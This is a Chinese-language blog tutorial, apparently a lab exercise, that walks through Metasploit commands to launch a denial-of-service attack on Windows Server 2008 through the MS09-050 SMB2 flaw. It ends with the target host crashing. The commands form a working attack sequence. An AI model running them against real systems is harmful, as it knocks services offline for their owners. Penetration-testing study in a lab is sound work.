Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


       

第二篇:

利用ms09_050_smb2_session_logoff漏洞攻击win server 2008主机

 

利用metasploit演示如何利用ms09_050_smb2_session_logoff漏洞对win server 2008进行DOS攻击

  1. 在kali中执行“msfconsole”,启动metasploit

      service postgresql start      开启PostgreSQL数据库

      msfconsole   启动metasploit

Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008_第1张图片

2. 搜索模块 

search  ms09_050_smb2_session_logoff

Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008_第2张图片

3. 运行命令:“use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff”,选择DOS攻击辅助模块

      use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff

4. 运行命令:show options查看配置选项

      show options

Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008_第3张图片

5. 设置目标主机的IP,SMB服务的端口

     运行命令: set RHOST 10.1.1.144

6. 开始攻击,出现下面的提示信息说明DOS攻击成功

     运行命令: run -j

Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008_第4张图片

7. 攻击成功,win server 2008已经蓝屏

Metasploit:利用ms09_050_smb2_session_logoff漏洞攻击win server 2008_第5张图片

 

参考链接:

              http://help.metasploit.com/


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,Metasploit,学习)